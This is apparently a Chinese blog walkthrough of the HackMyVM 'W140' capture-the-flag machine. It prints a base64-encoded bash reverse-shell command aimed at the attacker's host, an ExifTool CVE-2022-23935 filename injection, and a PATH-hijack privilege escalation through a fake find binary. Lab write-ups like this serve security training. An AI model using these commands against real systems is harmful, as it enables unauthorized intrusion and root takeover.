[HackmyVM]靶场 W140

kali:192.168.56.104

主机发现

arp-scan -l

靶机ip:192.168.56.107

端口扫描

nmap -p- 192.168.56.107

开启了22 80 端口

目录扫描

gobuster dir -u http://192.168.56.107 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirb/common.txt

发现service.html可以文件上传

测试发现必须二进制内容为png或者jpeg格式才行,对文件名和文件类型并不检测

上传之后会有个文件分析的界面

利用ExifTool进行分析,版本12.37

搜索发现有CVE cowsecurity/CVE-2022-23935: CVE-2022-23935 exploit PoC exiftool version 12.37 written in python (github.com)

CVE-2022-23935-PoC-Exploit/exploit.sh at main · dpbe32/CVE-2022-23935-PoC-Exploit (github.com)

通过修改文件名进行命令执行

因为没有回显,直接反弹shell,注意对反弹shell指令base64编码

echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEwNC80NTY3ICAwPiYxJw==|base64 -d|sh|

想办法提权到ghost

再/var/www目录看到一个隐藏的png文件

 把图片传给kali

发现是个二维码

用草料识别一下

密码BaoeCblP5KGJDmA

然后ssh连接ghost,下拿到第一个flag

.

sudo -l发现可以提权

用于清理日志文件和将图片所有者和所属组改为root root

而这个find指令没有明确的目录,所有我们可以伪造find

还需要修改环境变量让执行Benz-w140的时候优先执行 tmp目录下的find

/tmp$ echo "/bin/bash" > find
/tmp$ chmod +x find
/tmp$ sudo PATH=/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games /opt/Benz-w140

注意给find添加执行权限

总结

1.ExifTool CVE-2022-23935 getshell

2.环境变量劫持提权

  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tao0845

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值